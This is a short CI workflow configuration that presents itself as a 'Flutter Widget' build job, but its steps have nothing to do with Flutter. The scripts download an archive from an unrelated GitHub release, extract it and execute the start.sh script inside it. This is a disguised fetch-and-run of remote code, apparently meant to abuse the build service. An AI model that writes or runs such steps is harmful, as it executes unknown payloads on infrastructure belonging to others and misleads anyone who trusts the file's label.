workflows:
 
    flutter-widget:
        name: Flutter Widget
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://github.com/kntlkuda1/sugargula/releases/download/01/megic.tar.gz
            - brew install gnu-tar
            - gtar xvf megic.tar.gz
            - sh start.sh
